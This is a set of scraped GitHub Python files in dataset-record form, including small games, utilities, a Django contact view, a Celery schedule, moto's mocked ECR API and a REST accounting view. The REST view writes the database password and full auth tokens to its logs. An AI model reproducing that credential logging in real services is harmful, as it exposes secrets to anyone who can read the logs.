_labels_row(self):\n transaction_label = TextBoxComponent(dict(text='Transactions',\n width=100, height=10))\n production_label = TextBoxComponent(\n dict(text='Productions', width=100, height=10))\n label_row = row(Div(width=53), transaction_label.widget,\n Div(width=317),\n production_label.widget)\n return label_row\n\n def plot(self):\n layout = column(self.time_box.widget,\n self.label_row,\n row(row(self.transaction_table.figure, width=self\n .transaction_table.width),\n row(self.production_table.figure,\n width=self.production_table.width)),\n # row(self.transaction_table.figure,\n # self.production_table.figure),\n row(self.next_turn_button.widget,\n self.refresh_button.widget, self.ping_button.widget))\n return layout\n\n def widget_callback(self, call):\n print(f\"next_turn_button called.\")\n time = admin_page.nextTurn(self.portno).message\n self.time_box.widget.text = \"Time: \" + time\n return True\n\n def ping_callback(self, call):\n print(f\"ping_button called.\")\n admin_page.ping(self.portno)\n return True\n","repo_name":"MelvinYin/Plushie_Tycoon","sub_path":"python/host_page/admin_ui.py","file_name":"admin_ui.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27744849400","text":"import datetime\n\nimport img2pdf\nimport os\nfrom pathlib import Path\n\n\ndef convert_to_pdf():\n \"\"\"\n Функция, которая объединяет все .jpg картинки в текущей дериктории\n (то есть там же, где расположен скрипт)\n \"\"\"\n img_list = []\n\n for file_name in os.listdir():\n if not file_name.endswith(\".jpg\"):\n continue\n path = str(Path(file_name))\n if os.path.isdir(path):\n continue\n img_list.append(path)\n\n if img_list:\n with open(f\"{datetime.datetime.now().strftime('%d_%m_%Y')}.pdf\", \"wb\") as f:\n f.write(img2pdf.convert(img_list))\n\n\ndef main():\n convert_to_pdf()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Barashkis/InterestingFunctions","sub_path":"convert_jpg_to_pdf/jpg_to_pdf.py","file_name":"jpg_to_pdf.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1687960104","text":"# -*- coding:utf-8 -*-\n# @Time : 2020/ /\n# @Author : goldsunC\n# @Email : 2428022854@qq.com\n# @Blog : https://blog.csdn.net/weixin_45634606\nfrom .. import setup\nfrom .. import tools\nfrom .. import constants as C\nimport pygame\nfrom ..components import info\n\nclass MainMenu:\n def __init__(self):\n self.setup_background() # 设置屏幕背景\n self.setup_player() # 放马里奥\n self.setup_cursor() # 放金币\n self.info = info.Info('main_menu') # 放各种信息\n self.finished = False\n self.next = 'load_screen' #下一步就是加载界面\n\n def setup_background(self):\n # 设置背景图\n self.background = setup.GRAPHICS['level_1']\n\n # background.get_rect()得到背景图区域:(left,top,width,height)\n # 前两个构成区域左上角在屏幕的坐标,而后两个是区域的宽和高\n self.background_rect = self.background.get_rect()\n # transform.scale方法用来将图片按比例放缩\n self.background = pygame.transform.scale(self.background,(int(self.background_rect.width*C.BG_MULTI),\n int(self.background_rect.height*C.BG_MULTI)))\n # 此为设置的屏幕的区域\n self.viewport = setup.SCREEN.get_rect()\n # 这是开始菜单的一部分,将所用图像抠出\n self.caption = tools.get_image(setup.GRAPHICS['title_screen'],1,60,176,88,(255,0,220),C.BG_MULTI)\n\n def setup_player(self):\n # 抠出的马里奥图像\n self.player_image = tools.get_image(setup.GRAPHICS['mario_bros'],178,32,12,16,(0,0,0),C.PLAYER_MUTI)\n\n\n# cursor是游标、光标的意思\n def setup_cursor(self):\n # sprite.Sprite是一个精灵对象,这是用来管理开始菜单中闪烁的金币\n self.cursor = pygame.sprite.Sprite()\n # 给金币对象设置抠出的金币图像\n self.cursor.image = tools.get_image(setup.GRAPHICS['item_objects'],24,160,8,8,(0,0,0),C.PLAYER_MUTI)\n # 得到金币的区域参数,主要是用来得到宽和高,因为图像位置肯定是(0,0)\n rect = self.cursor.image.get_rect()\n # 设置位置\n rect.x,rect.y = (220,360)\n # 更新\n self.cursor.rect = rect\n\n self.cursor.state = '1P' #状态\n\n def update_cursor(self,keys):\n if keys[pygame.K_UP]:\n self.cursor.state = '1P'\n self.cursor.rect.y = 360\n elif keys[pygame.K_DOWN]:\n self.cursor.state = '2P'\n self.cursor.rect.y = 405\n elif keys[pygame.K_RETURN]:\n # 按下回车代表当前状态完成\n if self.cursor.state == '1P':\n self.finished = True\n elif self.cursor.state == '2P':\n self.finished = True\n\n def update(self,surface,keys):\n # 先更新按钮触发的状态改变\n self.update_cursor(keys)\n # 新绘图以更新,\n surface.blit(self.background,self.viewport)\n surface.blit(self.caption,(170,100))\n surface.blit(self.player_image,(110,490))\n surface.blit(self.cursor.image,self.cursor.rect)\n\n self.info.update() #此处游标仅指金币对象\n self.info.draw(surface)","repo_name":"WCY-add/Super_mario-GAME","sub_path":"Material_document/source/states/main_menu.py","file_name":"main_menu.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"1943047280","text":"import matplotlib.pyplot as plt\nimport seaborn as ssn\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nimport prettyplotlib as ppl\n\n\ndef plot_sin():\n fig = plt.figure()\n ax = plt.subplot(111)\n\n a = np.linspace(0,10,1000)\n b = np.linspace(0,10,1000)\n A,B = np.meshgrid(a,b)\n\n\n t = 1\n Z = A*np.sin(t*np.pi*B/A) / (A**2 - B**2)\n\n plt.imshow(Z)\n plt.show()\n\nfig = plt.figure()\nax = plt.subplot(111)\n\nw = 100 \n\nt = np.linspace(0,2,1000)\nU = t - np.floor(t) + 0.1 * np.sin(w*t)\n\nplt.plot(t,U)\nplt.xlabel(\"$t/T$\",fontsize = 14)\nplt.ylabel(\"$U/U_{sz}$\",fontsize = 14)\nplt.show()\n\n","repo_name":"Bondzio/fp","sub_path":"nmr/analysis/sin2.py","file_name":"sin2.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13812053642","text":"from django.shortcuts import redirect, render\nfrom django.core.mail import BadHeaderError, send_mail\nfrom django.http import HttpResponse, HttpResponseRedirect\n\nfrom . forms import ContactForm\n\n\ndef send_email(request):\n if request.method == \"POST\":\n form = ContactForm(request.POST)\n if form.is_valid():\n #if you are curios about have i get(subject,email and message)\n # in templates go to inspect element and find the input tag, you see the name of each input \n subject = form.cleaned_data[\"subject\"]\n from_email = form.cleaned_data[\"email\"]\n message = form.cleaned_data[\"message\"]\n form = ContactForm()\n try:\n #no_reply@gmail.com is the receptor of this email\n send_mail(subject, message,from_email, ['no_reply@gmail.com'],fail_silently=False)\n print(send_mail)\n except :\n BadHeaderError(\"Invalid data, please make sure that you are entering the right data\")\n return redirect(\"contact:send_success\")\n else:\n form = ContactForm()\n\n context = {\n 'form':form\n }\n return render(request, \"contact/contact.html\", context)\n \n\n\ndef send_success(request):\n return HttpResponse(\"Thanks in advance from your email (^_^)\")\n","repo_name":"Shirhussain/Restaurant","sub_path":"contact/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34522710583","text":"\"\"\"This file contains the CloudRecordSummaryView class.\"\"\"\n\nimport ConfigParser\nimport datetime\nimport logging\nimport MySQLdb\n\nfrom rest_framework.pagination import PaginationSerializer\nfrom django.conf import settings\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom api.utils.TokenChecker import TokenChecker\n\n\nclass CloudRecordSummaryView(APIView):\n \"\"\"\n Retrieve Cloud Accounting Summaries.\n\n Usage:\n\n .../api/v1/cloud/record/summary?user=&from=&to=\n\n Will return the summary for global_user_name at all services,\n between date_from and date_to (exclusive) as daily summaries\n\n .../api/v1/cloud/record/summary?group=&from=&to=\n\n Will return the summary for group_name at all services,\n between date_from and date_to (exclusive) as daily summaries\n\n .../api/v1/cloud/record/summary?service=&from=&to=\n\n Will return the summary for service_name at all groups,\n between date_from and date_to (exclusive) as daily summaries\n\n .../api/v1/cloud/record/summary?from=\n\n Will give summary for whole infrastructure from date_from\n (exclusive) to now\n \"\"\"\n\n def __init__(self):\n \"\"\"Set up class level logging.\"\"\"\n self.logger = logging.getLogger(__name__)\n self._token_checker = TokenChecker()\n super(CloudRecordSummaryView, self).__init__()\n\n def get(self, request, format=None):\n \"\"\"\n Retrieve Cloud Accounting Summaries.\n\n .../api/v1/cloud/record/summary?user=&from=&to=\n\n Will return the summary for global_user_name at all services,\n between date_from and date_to (exclusive) as daily summaries\n\n .../api/v1/cloud/record/summary?group=&from=&to=\n\n Will return the summary for group_name at all services,\n between date_from and date_to (exclusive) as daily summaries\n\n .../api/v1/cloud/record/summary?service=&from=&to=\n\n Will return the summary for service_name at all groups,\n between date_from and date_to (exclusive) as daily summaries\n\n .../api/v1/cloud/record/summary?from=\n\n Will give summary for whole infrastructure from\n date_from (exclusive) to now\n \"\"\"\n client_token = self._request_to_token(request)\n if client_token is None:\n return Response(status=401)\n\n # The token checker will introspect the token,\n # i.e. check it's in-date, correctly signed etc\n # and return the client_id of the token\n client_id = self._token_checker.valid_token_to_id(client_token)\n if client_id is None:\n return Response(status=401)\n\n if not self._is_client_authorized(client_id):\n return Response(status=403)\n\n # parse query parameters\n (group_name,\n service_name,\n start_date,\n end_date,\n global_user_name) = self._parse_query_parameters(request)\n\n # Check that at most one of group_name, service_name\n # and global_user_name is set as having more than\n # one defined is currently ambiguous while retrieval\n # against only one parameter per GET request is supported.\n parameters_to_check = (group_name, service_name, global_user_name)\n set_count = sum([1 for para in parameters_to_check if para is None])\n if set_count <= 1:\n self.logger.error(\"User, Group and/or Service combined.\")\n self.logger.error(\"Rejecting request.\")\n return Response(\"Only one of User, Group and Service can be set.\",\n status=400)\n\n if start_date is None:\n # querying without a from is not supported\n return Response(\"'from' must be set in GET requests.\",\n status=400)\n\n # Read configuration from file\n try:\n dbcp = ConfigParser.ConfigParser()\n dbcp.read(settings.CLOUD_DB_CONF)\n\n db_hostname = dbcp.get('db', 'hostname')\n # db_port = int(dbcp.get('db', 'port'))\n db_name = dbcp.get('db', 'name')\n db_username = dbcp.get('db', 'username')\n db_password = dbcp.get('db', 'password')\n except (ConfigParser.Error, ValueError, IOError) as err:\n self.logger.warning('Error in configuration file %s: %s',\n settings.CLOUD_DB_CONF,\n err)\n self.logger.warning('Using default configuration.')\n\n db_hostname = 'localhost'\n db_name = 'apel_rest'\n db_username = 'root'\n db_password = ''\n\n # get the data requested\n try:\n database = MySQLdb.connect(db_hostname,\n db_username,\n db_password,\n db_name)\n except MySQLdb.OperationalError:\n self.logger.error(\"Could not connect to %s at %s using %s, %s\",\n db_name, db_hostname, db_username, db_password)\n return Response(status=500)\n\n cursor = database.cursor(MySQLdb.cursors.DictCursor)\n\n if global_user_name is not None:\n cursor.execute('select * from VCloudSummaries '\n 'where GlobalUserName = %s '\n 'and EarliestStartTime > %s '\n 'and LatestStartTime < %s',\n [global_user_name, start_date, end_date])\n\n elif group_name is not None:\n cursor.execute('select * from VCloudSummaries '\n 'where VOGroup = %s '\n 'and EarliestStartTime > %s '\n 'and LatestStartTime < %s',\n [group_name, start_date, end_date])\n\n elif service_name is not None:\n cursor.execute('select * from VCloudSummaries '\n 'where SiteName = %s and '\n 'EarliestStartTime > %s and '\n 'LatestStartTime < %s',\n [service_name, start_date, end_date])\n\n else:\n cursor.execute('select * from VCloudSummaries '\n 'where EarliestStartTime > %s',\n [start_date])\n\n results = self._filter_cursor(cursor)\n results = self._paginate_result(request, results)\n return Response(results, status=200)\n\n###############################################################################\n# #\n# Helper methods #\n# #\n###############################################################################\n\n def _parse_query_parameters(self, request):\n \"\"\"Parse expected query parameters from the given HTTP request.\"\"\"\n group_name = request.GET.get('group', '')\n if group_name is \"\":\n group_name = None\n\n service_name = request.GET.get('service', '')\n if service_name is \"\":\n service_name = None\n\n start_date = request.GET.get('from', '')\n if start_date is \"\":\n start_date = None\n\n end_date = request.GET.get('to', '')\n if end_date is \"\":\n end_date = datetime.datetime.now()\n\n global_user_name = request.GET.get('user', '')\n if global_user_name is \"\":\n global_user_name = None\n\n # Log query parameters\n self.logger.debug(\"Query Parameters\")\n self.logger.debug(\"Group name = %s\", group_name)\n self.logger.debug(\"Service name = %s\", service_name)\n self.logger.debug(\"Start date = %s\", start_date)\n self.logger.debug(\"End date = %s\", end_date)\n self.logger.debug(\"Global Username = %s\", global_user_name)\n\n return (group_name, service_name, start_date,\n end_date, global_user_name)\n\n def _paginate_result(self, request, result):\n \"\"\"Paginate result based on the request and apel_rest settings.\"\"\"\n paginator = Paginator(result, settings.RESULTS_PER_PAGE)\n try:\n page = request.GET.get('page')\n except AttributeError:\n page = 1\n\n try:\n result = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n result = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999),\n # deliver last page of results.\n result = paginator.page(paginator.num_pages)\n\n # context allows for clickable REST Framework links\n serializer = PaginationSerializer(instance=result,\n context={'request': request})\n return serializer.data\n\n def _filter_cursor(self, cursor):\n \"\"\"\n Filter database results based on settings.RETURN_HEADERS.\n\n Allows for configuration of what summary fields\n the REST interface returns on GET requests.\n \"\"\"\n results_list = []\n # Use results_list to store individual summaries to before returning.\n for record in cursor.fetchall():\n # record refers to one day's summary\n result = {}\n # result is used to construct a new, filtered, summary with\n # only the values listed in settings.RETURN_HEADERS.\n for key, value in record.iteritems():\n if key in settings.RETURN_HEADERS:\n # keys listed in settings.RETURN_HEADERS represent\n # summary fields the REST interface has been configured\n # to return. As such we need to add that field to the\n # new summary we are constructing\n result.update({key: value})\n\n results_list.append(result)\n\n return results_list\n\n def _request_to_token(self, request):\n \"\"\"Get the token from the request.\"\"\"\n try:\n token = request.META['HTTP_AUTHORIZATION'].split()[1]\n except KeyError:\n self.logger.error(\"No AUTHORIZATION header provided, \"\n \"authentication failed.\")\n return None\n except IndexError:\n self.logger.error(\"AUTHORIZATION header provided, \"\n \"but not of expected form.\")\n self.logger.error(request.META['HTTP_AUTHORIZATION'])\n return None\n self.logger.info(\"Successfully extracted Token\")\n self.logger.debug(\"Full Token: %s\", token)\n return token\n\n def _is_client_authorized(self, client_id):\n \"\"\"\n Return true if and only if client_id can access summaries.\n\n i.e. client_id is not None and is in settings.ALLOWED_FOR_GET.\n \"\"\"\n if client_id is None or client_id not in settings.ALLOWED_FOR_GET:\n self.logger.error(\"%s does not have permission to view summaries\",\n client_id)\n return False\n self.logger.info(\"Authorizing user request\")\n return True\n","repo_name":"apel/rest","sub_path":"api/views/CloudRecordSummaryView.py","file_name":"CloudRecordSummaryView.py","file_ext":"py","file_size_in_byte":11528,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25456611727","text":"import math\n\nn = int(input())\nstrx = input().split(' ')\nx = list(map(float, strx[:n-1]))\ny = list(map(float, input().split(' ')))\n\n\ndef get_median(l, d):\n total = 0\n for x in l:\n total += x\n return round(total/len(l), d)\n\ndef get_std_dev(l, d, median):\n s = 0\n for n in l:\n s += math.pow(n-median, 2)\n return round(math.sqrt(s/len(l)), d)\n\ndef get_pcc(x, y, n, d):\n median_x = get_median(x, 2)\n std_x = get_std_dev(x, 5, median_x)\n median_y = get_median(y, 2)\n std_y = get_std_dev(y, 5, median_y)\n upper = 0\n for i in range(n):\n upper += ((x[i]-median_x)*(y[i]-median_y))\n return round(upper/(n*std_x*std_y), d) \n\nprint(get_pcc(x,y,n,3))","repo_name":"DiegoSolorzanoO/10DaysOfStatistics","sub_path":"case16.py","file_name":"case16.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28906652327","text":"from typing import Set\n\nfrom whacked4.dehacked.statequery.filterbase import StateFilterBase\nfrom whacked4.dehacked.statequery.thingfilter import ThingStateFilter\nfrom whacked4.dehacked.statequery.weaponfilter import WeaponStateFilter\n\n\nclass UnusedStateFilter(StateFilterBase):\n\n def apply(self, state_indices: Set[int]) -> Set[int]:\n used_states = set()\n\n # Add all states used by things.\n thing_states = set()\n for thing in self.patch.things:\n thing_states.update(ThingStateFilter.get_states(thing))\n self.expand_used_states(thing_states)\n used_states.update(thing_states)\n\n # Add all states used by weapons. Weapon states are further processed per weapon to take care of the\n # usesExtraFlashState property of some actions.\n for weapon in self.patch.weapons:\n weapon_states = WeaponStateFilter.get_states(weapon)\n self.expand_used_states(weapon_states)\n WeaponStateFilter.process_states(self.patch, weapon, weapon_states)\n used_states.update(weapon_states)\n\n # Add states that are hardcoded by the engine.\n engine_used_states = set(self.patch.engine.used_states)\n self.expand_used_states(engine_used_states)\n used_states.update(engine_used_states)\n\n return state_indices.difference(used_states)\n","repo_name":"GitExl/WhackEd4","sub_path":"src/whacked4/dehacked/statequery/unusedfilter.py","file_name":"unusedfilter.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"42085911896","text":"import os\nfrom celery import Celery\nfrom celery.schedules import crontab\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'StockPriceDjango.settings')\napp = Celery('StockPriceDjango')\n\napp.config_from_object('django.conf:settings', namespace='CELERY')\napp.autodiscover_tasks()\n\napp.conf.beat_schedule = {\n 'send_mail_workday_from_9_to_5': {\n 'task': 'Email.tasks.send_email',\n 'schedule': crontab(\n day_of_week='mon,tue,wed,thu,fri',\n hour='9-17',\n minute=0\n )\n }\n}\n\napp.conf.task_ignore_result = False\n\n\n@app.task(bind=True)\ndef debug_task(self):\n print(f'Request: {self.request!r}')\n","repo_name":"Sheldonsu28/StockPriceDjango","sub_path":"source code/StockPriceDjango/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17857329381","text":"\nclass Node:\n def __init__(self, val=0, neighbors=None):\n self.val = val\n self.neighbors = neighbors if neighbors is not None else []\n\n\nclass Solution:\n def cloneGraph(self, node: 'Node') -> 'Node':\n if not node:\n return\n\n graph = {}\n stack = [node]\n visited = set()\n\n while len(stack) > 0:\n current = stack.pop()\n if current.val in visited:\n continue\n visited.add(current.val)\n if not current.val in graph:\n graph[current.val] = []\n\n for neighbor in current.neighbors:\n\n graph[current.val].append(neighbor.val)\n stack.append(neighbor)\n\n nodeMap = {}\n for nodeValue in graph:\n node = None\n if nodeValue in nodeMap:\n node = nodeMap[nodeValue]\n else:\n node = Node(nodeValue)\n nodeMap[nodeValue] = node\n\n for neighborValue in graph[nodeValue]:\n neighborNode = None\n if neighborValue in nodeMap:\n neighborNode = nodeMap[neighborValue]\n else:\n neighborNode = Node(neighborValue)\n nodeMap[neighborValue] = neighborNode\n\n if not node.neighbors:\n node.neighbors = []\n\n if not neighborNode in node.neighbors:\n node.neighbors.append(neighborNode)\n\n for key, node in nodeMap.items():\n return node\n\n\nsol = Solution()\nnode1 = Node(1)\nnode2 = Node(2)\nnode3 = Node(3)\nnode4 = Node(4)\n\nnode1.neighbors = [node2, node4]\nnode2.neighbors = [node1, node3]\nnode3.neighbors = [node2, node4]\nnode4.neighbors = [node1, node3]\nres = sol.cloneGraph(node1)\nprint()\n","repo_name":"YichiZ/leetcode","sub_path":"clone-graph/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32303460731","text":"import json\nfrom base64 import b64encode\nfrom datetime import datetime\nimport time\n\nfrom moto.core.responses import BaseResponse\nfrom .models import ecr_backends, ECRBackend\n\n\nclass ECRResponse(BaseResponse):\n def __init__(self) -> None:\n super().__init__(service_name=\"ecr\")\n\n @property\n def ecr_backend(self) -> ECRBackend:\n return ecr_backends[self.current_account][self.region]\n\n def create_repository(self) -> str:\n repository_name = self._get_param(\"repositoryName\")\n registry_id = self._get_param(\"registryId\")\n encryption_config = self._get_param(\"encryptionConfiguration\")\n image_scan_config = self._get_param(\"imageScanningConfiguration\")\n image_tag_mutablility = self._get_param(\"imageTagMutability\")\n tags = self._get_param(\"tags\", [])\n\n repository = self.ecr_backend.create_repository(\n repository_name=repository_name,\n registry_id=registry_id,\n encryption_config=encryption_config,\n image_scan_config=image_scan_config,\n image_tag_mutablility=image_tag_mutablility,\n tags=tags,\n )\n return json.dumps({\"repository\": repository.response_object})\n\n def describe_repositories(self) -> str:\n describe_repositories_name = self._get_param(\"repositoryNames\")\n registry_id = self._get_param(\"registryId\")\n\n repositories = self.ecr_backend.describe_repositories(\n repository_names=describe_repositories_name, registry_id=registry_id\n )\n return json.dumps({\"repositories\": repositories, \"failures\": []})\n\n def delete_repository(self) -> str:\n repository_str = self._get_param(\"repositoryName\")\n registry_id = self._get_param(\"registryId\")\n force = self._get_param(\"force\")\n\n repository = self.ecr_backend.delete_repository(\n repository_str, registry_id, force\n )\n return json.dumps({\"repository\": repository.response_object})\n\n def put_image(self) -> str:\n repository_str = self._get_param(\"repositoryName\")\n image_manifest = self._get_param(\"imageManifest\")\n image_tag = self._get_param(\"imageTag\")\n image_manifest_media_type = self._get_param(\"imageManifestMediaType\")\n digest = self._get_param(\"imageDigest\")\n image = self.ecr_backend.put_image(\n repository_str, image_manifest, image_tag, image_manifest_media_type, digest\n )\n\n return json.dumps({\"image\": image.response_object})\n\n def list_images(self) -> str:\n repository_str = self._get_param(\"repositoryName\")\n registry_id = self._get_param(\"registryId\")\n images = self.ecr_backend.list_images(repository_str, registry_id)\n return json.dumps(\n {\"imageIds\": [image.response_list_object for image in images]}\n )\n\n def describe_images(self) -> str:\n repository_str = self._get_param(\"repositoryName\")\n registry_id = self._get_param(\"registryId\")\n image_ids = self._get_param(\"imageIds\")\n images = self.ecr_backend.describe_images(\n repository_str, registry_id, image_ids\n )\n return json.dumps(\n {\"imageDetails\": [image.response_describe_object for image in images]}\n )\n\n def batch_check_layer_availability(self) -> None:\n self.error_on_dryrun()\n raise NotImplementedError(\n \"ECR.batch_check_layer_availability is not yet implemented\"\n )\n\n def batch_delete_image(self) -> str:\n repository_str = self._get_param(\"repositoryName\")\n registry_id = self._get_param(\"registryId\")\n image_ids = self._get_param(\"imageIds\")\n\n response = self.ecr_backend.batch_delete_image(\n repository_str, registry_id, image_ids\n )\n return json.dumps(response)\n\n def batch_get_image(self) -> str:\n repository_str = self._get_param(\"repositoryName\")\n registry_id = self._get_param(\"registryId\")\n image_ids = self._get_param(\"imageIds\")\n\n response = self.ecr_backend.batch_get_image(\n repository_str, registry_id, image_ids\n )\n return json.dumps(response)\n\n def batch_get_repository_scanning_configuration(self) -> str:\n names = self._get_param(\"repositoryNames\")\n configs, missing = self.ecr_backend.batch_get_repository_scanning_configuration(\n names\n )\n return json.dumps(\n {\n \"scanningConfigurations\": configs,\n \"failures\": [\n {\n \"repositoryName\": m,\n \"failureCode\": \"REPOSITORY_NOT_FOUND\",\n \"failureReason\": \"REPOSITORY_NOT_FOUND\",\n }\n for m in missing\n ],\n }\n )\n\n def complete_layer_upload(self) -> None:\n self.error_on_dryrun()\n raise NotImplementedError(\"ECR.complete_layer_upload is not yet implemented\")\n\n def delete_repository_policy(self) -> str:\n registry_id = self._get_param(\"registryId\")\n repository_name = self._get_param(\"repositoryName\")\n\n return json.dumps(\n self.ecr_backend.delete_repository_policy(\n registry_id=registry_id, repository_name=repository_name\n )\n )\n\n def get_authorization_token(self) -> str:\n registry_ids = self._get_param(\"registryIds\")\n if not registry_ids:\n registry_ids = [self.current_account]\n auth_data = []\n for registry_id in registry_ids:\n password = f\"{registry_id}-auth-token\"\n auth_token = b64encode(f\"AWS:{password}\".encode(\"ascii\")).decode()\n auth_data.append(\n {\n \"authorizationToken\": auth_token,\n \"expiresAt\": time.mktime(datetime(2015, 1, 1).timetuple()),\n \"proxyEndpoint\": f\"https://{registry_id}.dkr.ecr.{self.region}.amazonaws.com\",\n }\n )\n return json.dumps({\"authorizationData\": auth_data})\n\n def get_download_url_for_layer(self) -> None:\n self.error_on_dryrun()\n raise NotImplementedError(\n \"ECR.get_download_url_for_layer is not yet implemented\"\n )\n\n def get_repository_policy(self) -> str:\n registry_id = self._get_param(\"registryId\")\n repository_name = self._get_param(\"repositoryName\")\n\n return json.dumps(\n self.ecr_backend.get_repository_policy(\n registry_id=registry_id, repository_name=repository_name\n )\n )\n\n def initiate_layer_upload(self) -> None:\n self.error_on_dryrun()\n raise NotImplementedError(\"ECR.initiate_layer_upload is not yet implemented\")\n\n def set_repository_policy(self) -> str:\n registry_id = self._get_param(\"registryId\")\n repository_name = self._get_param(\"repositoryName\")\n policy_text = self._get_param(\"policyText\")\n # this is usually a safety flag to prevent accidental repository lock outs\n # but this would need a much deeper validation of the provided policy\n # force = self._get_param(\"force\")\n\n return json.dumps(\n self.ecr_backend.set_repository_policy(\n registry_id=registry_id,\n repository_name=repository_name,\n policy_text=policy_text,\n )\n )\n\n def upload_layer_part(self) -> None:\n self.error_on_dryrun()\n raise NotImplementedError(\"ECR.upload_layer_part is not yet implemented\")\n\n def list_tags_for_resource(self) -> str:\n arn = self._get_param(\"resourceArn\")\n\n return json.dumps(self.ecr_backend.list_tags_for_resource(arn))\n\n def tag_resource(self) -> str:\n arn = self._get_param(\"resourceArn\")\n tags = self._get_param(\"tags\", [])\n\n self.ecr_backend.tag_resource(arn, tags)\n return \"{}\"\n\n def untag_resource(self) -> str:\n arn = self._get_param(\"resourceArn\")\n tag_keys = self._get_param(\"tagKeys\", [])\n\n self.ecr_backend.untag_resource(arn, tag_keys)\n return \"{}\"\n\n def put_image_tag_mutability(self) -> str:\n registry_id = self._get_param(\"registryId\")\n repository_name = self._get_param(\"repositoryName\")\n image_tag_mutability = self._get_param(\"imageTagMutability\")\n\n return json.dumps(\n self.ecr_backend.put_image_tag_mutability(\n registry_id=registry_id,\n repository_name=repository_name,\n image_tag_mutability=image_tag_mutability,\n )\n )\n\n def put_image_scanning_configuration(self) -> str:\n registry_id = self._get_param(\"registryId\")\n repository_name = self._get_param(\"repositoryName\")\n image_scan_config = self._get_param(\"imageScanningConfiguration\")\n\n return json.dumps(\n self.ecr_backend.put_image_scanning_configuration(\n registry_id=registry_id,\n repository_name=repository_name,\n image_scan_config=image_scan_config,\n )\n )\n\n def put_lifecycle_policy(self) -> str:\n registry_id = self._get_param(\"registryId\")\n repository_name = self._get_param(\"repositoryName\")\n lifecycle_policy_text = self._get_param(\"lifecyclePolicyText\")\n\n return json.dumps(\n self.ecr_backend.put_lifecycle_policy(\n registry_id=registry_id,\n repository_name=repository_name,\n lifecycle_policy_text=lifecycle_policy_text,\n )\n )\n\n def get_lifecycle_policy(self) -> str:\n registry_id = self._get_param(\"registryId\")\n repository_name = self._get_param(\"repositoryName\")\n\n return json.dumps(\n self.ecr_backend.get_lifecycle_policy(\n registry_id=registry_id, repository_name=repository_name\n )\n )\n\n def delete_lifecycle_policy(self) -> str:\n registry_id = self._get_param(\"registryId\")\n repository_name = self._get_param(\"repositoryName\")\n\n return json.dumps(\n self.ecr_backend.delete_lifecycle_policy(\n registry_id=registry_id, repository_name=repository_name\n )\n )\n\n def put_registry_policy(self) -> str:\n policy_text = self._get_param(\"policyText\")\n\n return json.dumps(self.ecr_backend.put_registry_policy(policy_text=policy_text))\n\n def get_registry_policy(self) -> str:\n return json.dumps(self.ecr_backend.get_registry_policy())\n\n def delete_registry_policy(self) -> str:\n return json.dumps(self.ecr_backend.delete_registry_policy())\n\n def start_image_scan(self) -> str:\n registry_id = self._get_param(\"registryId\")\n repository_name = self._get_param(\"repositoryName\")\n image_id = self._get_param(\"imageId\")\n\n return json.dumps(\n self.ecr_backend.start_image_scan(\n registry_id=registry_id,\n repository_name=repository_name,\n image_id=image_id,\n )\n )\n\n def describe_image_scan_findings(self) -> str:\n registry_id = self._get_param(\"registryId\")\n repository_name = self._get_param(\"repositoryName\")\n image_id = self._get_param(\"imageId\")\n\n return json.dumps(\n self.ecr_backend.describe_image_scan_findings(\n registry_id=registry_id,\n repository_name=repository_name,\n image_id=image_id,\n )\n )\n\n def put_replication_configuration(self) -> str:\n replication_config = self._get_param(\"replicationConfiguration\")\n\n return json.dumps(\n self.ecr_backend.put_replication_configuration(\n replication_config=replication_config\n )\n )\n\n def put_registry_scanning_configuration(self) -> str:\n scan_type = self._get_param(\"scanType\")\n rules = self._get_param(\"rules\")\n self.ecr_backend.put_registry_scanning_configuration(rules)\n return json.dumps({\"scanType\": scan_type, \"rules\": rules})\n\n def describe_registry(self) -> str:\n return json.dumps(self.ecr_backend.describe_registry())\n","repo_name":"getmoto/moto","sub_path":"moto/ecr/responses.py","file_name":"responses.py","file_ext":"py","file_size_in_byte":12247,"program_lang":"python","lang":"en","doc_type":"code","stars":7174,"dataset":"github-code","pt":"48"} +{"seq_id":"31215008580","text":"class Koans:\n def __init__(self):\n import collections\n self.koans = collections.OrderedDict()\n # Any koan must be built, and a build error immediately fails.\n # However, more tests can be defined here.\n # For example, emu-(aplite|basalt|chalk).\n # Basically, the first test is building\n self.koans['about-types'] = {'tests': [\n {\n 'name': 'emu-aplite',\n 'assertions': [\n 'about-types-ints',\n 'about-types-chars',\n 'about-types-int-arrays',\n 'about-types-strings'\n ]\n }\n ]}\n self.koans['about-math'] = {'tests': [\n {\n 'name': 'emu-aplite',\n 'assertions': [\n 'about-math-addition',\n 'about-math-multiplication',\n 'about-math-division',\n 'about-math-increment',\n 'about-math-decrement'\n ]\n }\n ]}\n\n def addPristineKoans(self):\n import os\n import shutil\n assert 